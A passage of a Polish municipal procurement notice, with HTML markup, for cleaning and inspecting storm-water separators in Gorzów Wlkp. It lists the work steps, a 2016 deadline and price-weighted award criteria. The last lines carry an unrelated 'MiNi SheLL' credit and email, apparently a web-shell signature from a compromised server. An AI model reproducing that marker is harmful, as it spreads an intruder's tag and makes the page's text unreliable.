15. Trzy separatory - ul. Wyszyńskiego - Górczyńska -  nr 29,30,31,
b) podczas czyszczenia separatorów w terminie od 15 września  do 31 października przeprowadzenia kontroli  separatorów zgodnie z art. 62 ust. 1  ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz sporządzenia z jej wyników protokołu.
c) odnotowania każdorazowo wszystkich czynności związanych z zamówieniem w książkach eksploatacji separatorów.
d) informowania pracowników Wydziału Gospodarki Komunalnej i Transportu Publicznego Urzędu Miasta Gorzowa Wlkp. o uszkodzeniach oraz o konieczności i zakresie przeprowadzenia niezbędnych napraw i remontów.
3. Zakres gruntownego czyszczenia , który Wykonawca zobowiązany jest wykonać w ramach przedmiotu zamówienia określonego w § 1 ust. 2 obejmuje wykonanie następujących czynności:
 - opróżnienie całkowicie osadnika,
- oczyszczenie ścian i przewodów osadnika wodą pod ciśnieniem,
- wykonanie inspekcji stanu ścian osadnika,
- opróżnienie całkowicie separatora,
- wyczyszczenie ścian, przewodów oraz pakietów lamelowych lub filtrów koalescencyjnych wraz z ich inspekcją,
- powtórne napełnienie wodą układu,
- wywóz i utylizację powstałych odpadów,
- uporządkowanie terenu wokół separatorów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. TERMIN PŁATNOŚCI - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com